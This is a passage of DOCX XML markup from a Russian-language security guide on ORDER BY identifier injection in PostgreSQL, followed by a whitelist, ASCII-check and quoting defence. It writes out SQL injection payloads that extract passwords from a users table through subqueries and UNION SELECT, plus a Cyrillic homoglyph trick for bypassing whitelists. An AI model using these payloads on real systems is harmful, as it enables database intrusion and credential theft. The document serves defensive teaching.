        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер отвечает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на этапе Parse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0F55AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант B — UNION через ORDER BY с конкатенацией (любой драйвер):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5631E6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /products?sort=name,(SELECT%20password%20FROM%20users%20LIMIT%201)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC527E9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort = "name,(SELECT password FROM users LIMIT 1)"</w:t>
      </w:r>
      <w:r>
        <w:t>. Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C98E9F0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY name,(SELECT password FROM users LIMIT 1) asc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71538349" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PostgreSQL принимает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>списком expression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через запятую. Subquery в ORDER BY-expression выполняется для каждой row. Если приложение возвращает ошибки сортировки — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ERROR: ORDER BY position N is not in select list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с N=subquery — error-канал. Если нет — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY name, password_value</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> упорядочивает rows одинаково (потому что password один и тот же для всех rows из этого subquery), но позволяет атакующему использовать ту же позицию для stacked UNION.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE08553" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Вариант C — Unicode homoglyph bypass (обход whitelist case-sensitive):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F679A17" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /products?sort=nаme  (latin n, Cyrillic 'а' U+0430, latin m, e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F5580" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"nаme" not in {"name"}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → True → проходит первую проверку. Но если разработчик после whitelist делает дополнительный rewrite (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort = sort.lower()</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CFCD9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240FF021" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sort = sort.lower()       # ← попытка fallback после miss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127BF1A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F1D747" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        sort = "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DC8932" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"nаme".lower() = "nаme"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Cyrillic 'а' остаётся), но если есть нормализация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>unicodedata.normalize("NFKC", sort)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Cyrillic 'а' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>остаётся как Cyrillic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (NFKC не схлопывает разные scripts). Если whitelist-проверка использует case-folding, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>homoglyphs обходят whitelist даже после normalize</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Реальная защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if sort.isascii() and sort in SORTABLE_COLUMNS</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E882B2A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">С реальной payload-цепочкой: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort=articles%20WHERE%20FALSE%20UNION%20SELECT%201,2,password,4,5%20FROM%20users--</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через append к valid column name даёт UNION через ORDER BY-context (требует, чтобы select-list count совпадал — 5 колонок).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ECC897" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Variant A — stacked queries → DROP / EXFIL. Variant B — extraction через ORDER BY-subquery + error-канал. Variant C — обход whitelist для одной из вышеперечисленных payload-цепочек. ORDER BY-injection особенно опасен тем, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>synthetically-valid sort-by-column</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> часто остаётся в логах как нормальный запрос с unusual sort, что не флагается мониторингом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED83CFF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Два независимых факта:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A8CAF2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bind-параметр не работает для identifier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PostgreSQL Wire Protocol определяет </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как value-placeholder, не как text-substitution. Это design-решение, потому что bind-параметр имеет тип и сериализуется бинарно. Identifier — это часть SQL-AST, парсится на этапе Parse, не Bind. Поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY $1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> синтаксически валиден (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> интерпретируется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>integer constant</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ORDER BY 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сортирует по первой колонке), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>никогда</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как «имя колонки». Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не bypass-trick</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>протокольное ограничение</w:t>
      </w:r>
      <w:r>
        <w:t>, которое разработчики недооценивают.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7E6442" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Python `set membership` не Unicode-aware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"a" == "а"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → False, потому что это разные code points (U+0061 vs U+0430). Whitelist через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — case-sensitive и script-sensitive. Сравнение работает на bytes, а пользовательский ввод может быть в любом Unicode.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8F03F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Сочетание этих двух фактов даёт identifier-injection: разработчик </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обязан</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> делать text-substitution (не bind), и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обязан</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> валидировать text — а валидация легко имеет holes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A858A8A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Защита: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (или SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quoted_name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>обязательный шаг даже после whitelist</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020881A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy.sql import quoted_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B124195" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666ADFCC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SORTABLE_COLUMNS = {"name", "price", "created_at", "rating"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1879D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F05FF33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>def safe_sort_column(sort: str) -&gt; str:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C0AD0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not sort.isascii() or sort not in SORTABLE_COLUMNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D7ABC0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return "created_at"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E4A497" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return sort</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8B0568" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5B3B5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># В SQL — quote_ident на стороне PG:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0301AE7E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>query = text(f'SELECT ... ORDER BY "{safe_sort_column(sort)}" ASC LIMIT 50')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728FB85D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Двойные кавычки + ASCII-check + whitelist = identifier injection физически невозможен. Альтернатива — построение запроса через SQLAlchemy ORM (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stmt.order_by(getattr(Product, sort))</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> после whitelist-проверки) — там identifier-quoting делается автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA0C885" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49393CC1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> все версии (поведение wire protocol неизменно с 7.4).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DC98EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> любая роль с EXECUTE-доступом к эндпоинту (для extraction — также SELECT на целевые таблицы).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E36349" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Драйвер для Variant A (stacked):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> simple-protocol режим (см. 3.5.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E64C149" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sort</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без whitelist ИЛИ whitelist без Unicode/ASCII-нормализации ИЛИ whitelist + concat без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>quote_ident</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
